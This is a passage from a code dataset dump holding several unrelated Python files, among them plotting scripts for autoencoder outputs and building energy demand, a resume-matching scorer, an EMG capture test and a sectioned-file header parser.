plt.savefig(fname=outfile,dpi=300,format='png')\n\n\n\n\nif __name__ == '__main__':\n home = home = expanduser(\"~\")\n \n save_dir = home + '/acoustic/ae_outputs_batch_16/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n model = ResNet_AE().to(device)\n \n state = torch.load('/data/acoustic_tmp/ae_acoustic_results_batch_16/models/acoustic_ae/1016_170641/model_best.pth')\n model.load_state_dict(state['state_dict'])\n model.eval()\n\n #load data\n dataset = AcousticDataset('/gsceph/adapd/acoustic/AA_10/train.pkl')\n \n idxs = np.random.randint(0, len(dataset), 10)\n print(idxs)\n data = []\n for i in idxs:\n img, label = dataset[i]\n name = dataset.data[i][0]\n data.append((name, img, label))\n data = np.array(data)\n print(data[:, 0])\n\n #generate data\n imgs = np.expand_dims(np.vstack(data[:, 1]), axis=1)\n print(imgs.shape)\n outputs = model(torch.from_numpy(imgs).to(device)).cpu().detach().numpy()\n\n #plot inputs and outputs\n for index, (full_name, _, label) in enumerate(data):\n name = full_name.split('/')[-1].replace('.pkl', '')\n #print(name)\n save_sample(np.squeeze(imgs[index], axis=0), save_dir + name + '_' + str(label) + '.png')\n save_sample(np.squeeze(outputs[index], axis=0), save_dir + 'output_' + name + '_' + str(label) + '.png')\n\n", "repo_name": "dwidemann/self_supervision_for_transfer_learning", "sub_path": "utils/generate_outputs_from_ae_model.py", "file_name": "generate_outputs_from_ae_model.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, 
{"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 41, "usage_type": "call"}, {"api_name": "model.ResNet_AE", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 45, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 46, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 47, "usage_type": "call"}, {"api_name": "data_loaders.AcousticDataset", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "35498830375", "text": "#!/usr/bin/env python\n\nif __name__ == \"__main__\":\n import re\n import tablib\n import logging\n import datetime\n import collections\n from argparse import ArgumentParser, FileType\n\n from core import HEADERS\n from core.parsers.mention import Mention\n\n date_prefix = datetime.date.today().strftime(\"%Y%m%d\")\n\n parser = ArgumentParser()\n parser.add_argument('input', metavar='INPUT', type=open)\n parser.add_argument(\"-o\", \"--output\", default=\"%s-newsclips.xls\" % date_prefix)\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.DEBUG)\n\n log = logging.getLogger('newsclips.main')\n\n data = tablib.Dataset(headers=HEADERS)\n\n for line in args.input:\n item = {}\n line = line.strip()\n\n if not line:\n continue\n\n mention = Mention(line)\n mention.append(data)\n\n book = tablib.Databook((data, data.filter([\"in-the-news\"])))\n with open(args.output, 'wb') as fp:\n fp.write(book.xls)\n", "repo_name": "edavis/newsclips", "sub_path": "newsclips.py", "file_name": "newsclips.py", "file_ext": "py", "file_size_in_byte": 986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.date.today", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "tablib.Dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "core.HEADERS", "line_number": 25, "usage_type": "name"}, {"api_name": "core.parsers.mention.Mention", "line_number": 34, "usage_type": "call"}, {"api_name": "tablib.Databook", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "73090276889", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 14\n\n@author: lkivi\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\n\n\ndef plot_buildings(param, nodes):\n \n\n \n max_width = 20\n shift = 50\n for n in nodes:\n nodes[n][\"x\"] += shift\n nodes[n][\"y\"] += shift\n \n nodes[6][\"x\"] += 12\n nodes[6][\"y\"] += 12\n \n \n \n \n\n total_demands = np.zeros(len(nodes))\n for n in nodes: \n total_demands[n] = sum(sum((nodes[n][\"heat\"][d][t] + nodes[n][\"cool\"][d][t]) for t in range(24)) * param[\"day_weights\"][d] for d in range(param[\"n_clusters\"]))\n max_total_demand = np.max(total_demands)\n \n total = {}\n for demand in [\"heat\", \"cool\"]:\n total[demand] = np.zeros(len(nodes))\n for n in nodes:\n total[demand][n] = sum(sum(nodes[n][demand][d][t] for t in range(24)) * param[\"day_weights\"][d] for d in range(param[\"n_clusters\"]))\n\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n ax.set_xlabel(\"x [m]\", fontweight = \"bold\", fontsize = 12)\n ax.set_ylabel(\"y [m]\", fontweight = \"bold\", fontsize = 12)\n \n width = np.zeros(len(nodes))\n \n for n in nodes:\n width[n] = (total_demands[n]/max_total_demand)**0.25 * max_width\n theta = 360 * total[\"heat\"][n]/(total[\"heat\"][n] + total[\"cool\"][n])\n plt.scatter(nodes[n][\"x\"], nodes[n][\"y\"])\n wedge_heat = patches.Wedge((nodes[n][\"x\"], nodes[n][\"y\"]), width[n], 0, theta, fill = True, facecolor = \"red\", edgecolor = \"black\")\n ax.add_patch(wedge_heat)\n wedge_cool = patches.Wedge((nodes[n][\"x\"], nodes[n][\"y\"]), width[n], theta, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\")\n ax.add_patch(wedge_cool)\n\n # Tag buildings\n for n in nodes:\n if nodes[n][\"name\"] in [\"15.1\", \"04.1\", \"16.4\", \"16.3\"]:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]+1.1*width[n], str(n+1), fontsize = 12, horizontalalignment='center', fontweight = \"bold\")\n elif nodes[n][\"name\"] in [\"\"]:\n ax.text(nodes[n][\"x\"]+0.45*width[n], nodes[n][\"y\"]+0.6*width[n], str(n+1), fontsize = 12)\n# ax.plot([nodes[n][\"x\"]+0.2*width[n], nodes[n][\"x\"]+9], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+19], \"black\") \n elif nodes[n][\"name\"] in [\"15.8\"]:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]-1.2*width[n], str(n+1), fontsize = 12, horizontalalignment='center', verticalalignment = \"top\")\n# ax.plot([nodes[n][\"x\"]-0.2*width[n], nodes[n][\"x\"]-8], [nodes[n][\"y\"]-0.3*width[n],nodes[n][\"y\"]-18], \"black\")\n elif nodes[n][\"name\"] in [\"\"]:\n ax.text(nodes[n][\"x\"]-0.5*width[n]-20, nodes[n][\"y\"]+0.5*width[n], str(n+1), fontsize = 12)\n# ax.plot([nodes[n][\"x\"]-0.2*width[n], nodes[n][\"x\"]-8], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+15], \"black\") \n else:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]+1.2*width[n], str(n+1), fontsize = 12, horizontalalignment='center')\n# ax.plot([nodes[n][\"x\"]+0.2*width[n], nodes[n][\"x\"]+8], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+15], \"black\")\n \n \n ax.set_axisbelow(True)\n plt.grid(color = \"grey\")\n \n# plt.axis('equal')\n ax.set_xlim(0,500)\n ax.set_ylim(0,400)\n xticks =np.arange(0,600,100)\n yticks =np.arange(0,500,100)\n plt.xticks(xticks)\n plt.yticks(yticks)\n xlabels = [\"{:2d}\".format(x) for x in xticks]\n ylabels = [\"{:2d}\".format(x) for x in yticks]\n ax.set_xticklabels(xlabels, fontsize = 12)\n ax.set_yticklabels(ylabels, fontsize = 12)\n \n plt.show()\n \n \n \n # Create legend\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n for n in 
nodes:\n plt.scatter(nodes[n][\"x\"], nodes[n][\"y\"], color = \"white\")\n wedges_legend = [patches.Wedge((70,325), 7.68, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,325), 7.68, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,275), 9.65, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,275), 9.65, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,225), 11.48, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,225), 11.48, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,175), 13.65, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,175), 13.65, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,125), 17.17, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,125), 17.17, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,75), 20.4, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,75), 20.4, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n ]\n for item in wedges_legend:\n ax.add_patch(item)\n \n ax.text(110, 325, \"100 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 275, \"250 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 225, \"500 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 175, \"1000 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 125, \"2500 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 75, \"5000 MWh\", fontsize = 12, verticalalignment = \"center\")\n\n ax.set_xlim(0,500)\n ax.set_ylim(0,400)\n xticks =np.arange(0,600,100)\n yticks =np.arange(0,500,100)\n plt.xticks(xticks)\n plt.yticks(yticks)\n xlabels = [\"{:2d}\".format(x) for x in xticks]\n ylabels = [\"{:2d}\".format(x) for x in yticks]\n ax.set_xticklabels(xlabels, fontsize = 12)\n ax.set_yticklabels(ylabels, fontsize = 12)\n \n# ax.grid(False)\n# ax.set_xticks([])\n# ax.set_yticks([])\n\n plt.show() \n \n \n \n \n\n # # 15.1 (Labor)\n# ax.text(nodes[0][\"x\"]+8, nodes[0][\"y\"]+22, \"1\", fontsize = 12)\n# ax.plot([nodes[0][\"x\"]+3, nodes[0][\"x\"]+9], [nodes[0][\"y\"]+3,nodes[0][\"y\"]+19], \"black\")\n# # 04.01 (Restaurant)\n# ax.text(nodes[1][\"x\"]+8, nodes[1][\"y\"]+22, \"2\", fontsize = 12)\n# ax.plot([nodes[1][\"x\"]+3, nodes[1][\"x\"]+9], [nodes[1][\"y\"]+3,nodes[1][\"y\"]+19], \"black\")\n# # 16.4 (Rechenzentrum)\n# ax.text(nodes[2][\"x\"]+8, nodes[2][\"y\"]+22, \"3\", fontsize = 12)\n# ax.plot([nodes[2][\"x\"]+3, nodes[2][\"x\"]+9], [nodes[2][\"y\"]+3,nodes[2][\"y\"]+19], \"black\")\n# # 16.3 (Rechenzentrum)\n# ax.text(nodes[3][\"x\"]+8, nodes[3][\"y\"]+22, \"4\", fontsize = 12)\n# ax.plot([nodes[3][\"x\"]+3, nodes[3][\"x\"]+9], [nodes[3][\"y\"]+3,nodes[3][\"y\"]+19], \"black\")\n# # 15.13\n# ax.text(nodes[4][\"x\"]+8, nodes[4][\"y\"]+22, \"5\", fontsize = 12)\n# ax.plot([nodes[4][\"x\"]+3, nodes[4][\"x\"]+9], [nodes[4][\"y\"]+3,nodes[4][\"y\"]+19], \"black\") \n# # 15.8\n# ax.text(nodes[5][\"x\"]-18, nodes[5][\"y\"]-35, \"6\", fontsize = 12)\n# ax.plot([nodes[5][\"x\"]-4, nodes[5][\"x\"]-9], [nodes[5][\"y\"]-5,nodes[5][\"y\"]-19], \"black\") \n# # 15.7\n# ax.text(nodes[6][\"x\"]+8, nodes[6][\"y\"]+22, \"7\", fontsize = 12)\n# ax.plot([nodes[6][\"x\"]+3, nodes[6][\"x\"]+9], 
[nodes[6][\"y\"]+3,nodes[6][\"y\"]+19], \"black\") \n# # 15.14\n# ax.text(nodes[7][\"x\"]+8, nodes[7][\"y\"]+22, \"7\", fontsize = 12)\n# ax.plot([nodes[7][\"x\"]+3, nodes[7][\"x\"]+9], [nodes[7][\"y\"]+3,nodes[6][\"y\"]+19], \"black\") \n \n #ax.text(317705,5642825,\"04.01\", zorder = 1000, fontsize = size) \n", "repo_name": "LKivi/Energy_System_Optimization", "sub_path": "EctoPlanner/plot_buildings.py", "file_name": "plot_buildings.py", "file_ext": "py", "file_size_in_byte": 7738, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.patches", 
"line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}]}
+{"seq_id": "8157355733", "text": "# Download required libraries\nimport docx2txt\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# This function's argument is a .docx file type document path\ndef main(document):\n # Load data\n resume = docx2txt.process(document)\n\n # in this expression we use another .docx file type document against the one we want to score\n # this document has the required keywords\n job_description = docx2txt.process('job_description.docx')\n\n # creating a list of text\n texts_list = [resume, job_description]\n\n count_v = CountVectorizer()\n\n count_matrix = count_v.fit_transform(texts_list)\n\n # Print the similar scores\n print('Curriculum Vitae score:')\n matchPercentage = cosine_similarity(count_matrix)[0][1] * 100\n\n print(str(round(matchPercentage, 2)) + ' %')\n input()\n\n\nif __name__ == '__main__':\n main('myCV.docx')\n", "repo_name": "cathbert/ResumeScanner", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "docx2txt.process", "line_number": 10, "usage_type": "call"}, {"api_name": "docx2txt.process", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "36169732518", "text": "import numpy as np\nimport time\nimport scipy.io as sio\n\nfrom ismore import brainamp_channel_lists\nfrom riglib.brainamp.rda import *\n\n\n\nfs = 1000\nchannels = brainamp_channel_lists.emg_eog2_eeg\n\ntotal_time = 120 # how many secs of data to receive and save\n\nn_samples = 2 * fs * total_time # allocate twice as much space as expected\nn_chan = len(channels)\n\n\nDATA = np.zeros((n_chan, n_samples))\nidxs = np.zeros(n_chan, int)\n\nchan_to_row = dict()\nfor row, chan in enumerate(channels):\n chan_to_row[chan] = row\n\nemgdata_obj = EMGData()\nemgdata_obj.start()\n\nstart_time = time.time()\n\nwhile (time.time() - start_time) < total_time:\n chan, data = emgdata_obj.get()\n\n row = chan_to_row[chan]\n idx = idxs[row]\n\n DATA[row, idx] = data['data']\n idxs[row] += 1\n\n\nsave_dict = {'data': DATA}\nsio.matlab.savemat('brainamp_data.mat', save_dict)\n", "repo_name": "carmenalab/brain-python-interface", "sub_path": "tests/ibmi/brainamp/basic_brainamp_test.py", "file_name": "basic_brainamp_test.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ismore.brainamp_channel_lists.emg_eog2_eeg", "line_number": 11, "usage_type": "attribute"}, {"api_name": "ismore.brainamp_channel_lists", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.io.matlab.savemat", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.matlab", "line_number": 42, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "34353116510", "text": "from __future__ import annotations\n\nimport pathlib\nimport os\n\nfrom header import SectionHeader\nfrom icecream import ic\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n# section_number : 6\n# section_description: file_classes\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~-\n\nclass MonitoredFile:\n\n def __init__(self, path : pathlib.Path) -> None:\n self.path = path\n self.filename = self.path.name.split(\".\")[0]\n self.filetype = self.path.name.split(\".\")[-1]\n self.prev_mod_time = self.get_mod_time()\n self.pulse_file_changed : bool = False\n\n # Attempt to read all lines on init to validate this is possible for this file.\n try:\n with open(self.path, \"r\") as f:\n self.lines : list[str] = f.readlines()\n except:\n self.lines_readable = False\n else:\n self.lines_readable = True\n\n # Save the RAM, we don't need the lines right now.\n self.lines : list[str] = []\n\n def get_mod_time(self) -> float:\n try:\n return os.stat(self.path).st_mtime\n except:\n return None\n\n def detect_file_change(self) -> bool:\n new_mod_time = self.get_mod_time()\n if self.prev_mod_time != new_mod_time and new_mod_time is not None:\n self.pulse_file_changed = True\n self.prev_mod_time = new_mod_time\n else:\n self.pulse_file_changed = False\n\n return self.pulse_file_changed\n\n def __eq__(self, __value: object) -> bool:\n return self.path == __value.path\n\n def __hash__(self) -> int:\n return hash(tuple(self.path, self.filename, self.filetype))\n\nclass SectionFile(MonitoredFile):\n \"\"\"MonitoredFile that is one numbered and described part of a MasterFile\"\"\"\n\n def __init__(\n self,\n path : pathlib.Path,\n section_number: int,\n section_description: str,\n master_file : MasterFile\n ) -> None:\n\n super().__init__(path)\n self.section_number = section_number\n self.section_description = section_description\n self.lines : list[str] = []\n self.master_file = master_file\n\nclass MasterFile(MonitoredFile):\n \"\"\"MonitoredFile with sections delimited by headers\"\"\"\n def __init__(self, path : pathlib.Path) -> None:\n\n super().__init__(path)\n self.dir_master_sections = path.parent.resolve().joinpath(\"sections\").joinpath(self.filename)\n self.sections : list[SectionFile] = []\n self.section_header : SectionHeader = None\n\nclass HeaderSpecifier:\n\n def __init__(\n self,\n header_start_line,\n header_end_line,\n section_number,\n section_description\n ) -> None:\n\n self.header_start_line = header_start_line\n self.header_end_line = header_end_line\n self.code_start_line = None\n self.code_end_line = None\n self.section_number = section_number\n self.section_description = section_description\n\ndef parse_master_file_headers(master_file : MasterFile) -> list[HeaderSpecifier]:\n\n # The header sequence specifies the position\n # in standard_header_sequence that is being\n # parsed for\n\n last_head_sq_index = len(master_file.section_header.key_sequence) - 1\n\n head_sq_index = 0\n parsing_header = False\n header_lines : list[str] = []\n return_header_specifiers : list[HeaderSpecifier] = []\n new_header_specifier = None\n\n section_number = None\n section_description = None\n\n # ic(\"Parsing master file\", master_file.filename)\n\n try:\n with open(master_file.path, \"r\") as f:\n\n for line_num, line in enumerate(f):\n line : str\n\n # ic(\"evaluating line\\n\", line)\n\n index_char = 0\n\n # Parse the entire line, which could contain\n # several header sequence elements\n while index_char < 
len(line):\n # ic(head_sq_index)\n current_header_sequence_string = master_file.section_header.key_sequence[head_sq_index]\n test_string = line[index_char : index_char + len(current_header_sequence_string)]\n header_sequence_match = test_string == current_header_sequence_string\n pulse_last_head_sq_index = last_head_sq_index == head_sq_index\n header_parse_success = False\n\n # ic(current_header_sequence_string, test_string, header_sequence_match, pulse_last_head_sq_index)\n\n # Header text match\n if header_sequence_match:\n index_char += len(master_file.section_header.key_sequence[head_sq_index])\n header_parse_success = True\n\n # Header sequence number\n if current_header_sequence_string == master_file.section_header.key_number:\n\n parse_key = False\n\n # Get the section number as string\n if pulse_last_head_sq_index:\n section_number_str = line[index_char:].strip()\n parse_key = True\n\n else:\n next_test_string = master_file.section_header.key_sequence[head_sq_index + 1]\n try:\n next_test_string_index = line[index_char:].index(next_test_string)\n except:\n pass\n else:\n section_number_str = line[index_char:][:next_test_string_index].strip()\n parse_key = True\n\n if parse_key:\n try:\n section_number = int(section_number_str)\n except:\n pass\n else:\n header_parse_success = True\n index_char += len(section_number_str)\n\n # Header sequence description\n if current_header_sequence_string == master_file.section_header.key_description:\n\n # Get the section number as string\n if pulse_last_head_sq_index:\n section_description = line[index_char:].strip()\n header_parse_success = True\n\n else:\n next_test_string = master_file.section_header.key_sequence[head_sq_index + 1]\n try:\n next_test_string_index = line[index_char:].index(next_test_string)\n except:\n pass\n else:\n section_description = line[index_char:][:next_test_string_index].strip()\n header_parse_success = True\n index_char += len(section_description)\n\n # Increment header sequence index\n # or reset if header parsing failure\n if header_parse_success:\n head_sq_index += 1\n if pulse_last_head_sq_index:\n\n head_sq_index = 0\n index_char = len(line)\n\n header_lines.append(line)\n\n # ic(\"header complete\", line_num, header_lines)\n new_header_specifier = HeaderSpecifier(\n header_start_line= line_num - len(header_lines) + 1,\n header_end_line= line_num,\n section_description= section_description,\n section_number= section_number\n )\n\n else:\n # ic(\"just a regular line\", line)\n head_sq_index = 0\n index_char = len(line)\n\n if new_header_specifier is not None:\n # ic(\"parsing when code starts and ends...\")\n\n if line.strip() and new_header_specifier.code_start_line is None:\n new_header_specifier.code_start_line = line_num\n # ic(new_header_specifier.code_start_line)\n\n if line.strip():\n new_header_specifier.code_end_line = line_num\n # ic(new_header_specifier.code_end_line)\n\n if not parsing_header:\n header_lines = []\n\n if header_parse_success and not pulse_last_head_sq_index:\n parsing_header = True\n header_lines.append(line.strip())\n # ic(\"Header parse success\",header_lines)\n\n elif parsing_header:\n\n parsing_header = False\n header_lines = []\n\n if new_header_specifier is not None:\n return_header_specifiers.append(new_header_specifier)\n\n except PermissionError:\n pass\n\n return return_header_specifiers\n\nif __name__ == \"__main__\":\n\n section_header = SectionHeader(\n key_sequence= [\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n 
\"spank \",\n \"numnumnum\",\n \"\\n\",\n \" dobonk: \",\n \"descdescdesc\",\n \"\\n\",\n \"] browntown\"\n ],\n key_number= \"numnumnum\",\n key_description= \"descdescdesc\"\n )\n\n temporary_file_path = pathlib.Path(\"test.txt\").resolve()\n\n with open(temporary_file_path, \"w\") as f:\n\n f.write(section_header.generate_header(number= 1, description= \"section one\"))\n\n f.write(\"\\n\")\n\n f.write(\"code code\\ncode section 1\\n\")\n\n f.write(section_header.generate_header(number= 2, description= \"section two\"))\n\n f.write(\"\\n\")\n\n f.write(\"code section 2\\n\\n\\n\\n\\nend of section2\")\n\n f.write(\"\\n\")\n f.write(\"spank \")\n\n mfile = MasterFile(\n path= temporary_file_path,\n dir_master_sections= pathlib.Path(\"temp_sections\").resolve()\n )\n mfile.section_header = section_header\n\n if not mfile.dir_master_sections.is_dir():\n os.mkdir(mfile.dir_master_sections)\n\n mfile.parse()\n\n for section in mfile.sections:\n print(f\"Section {section.section_number}, {section.section_description}\")\n for line in section.lines:\n 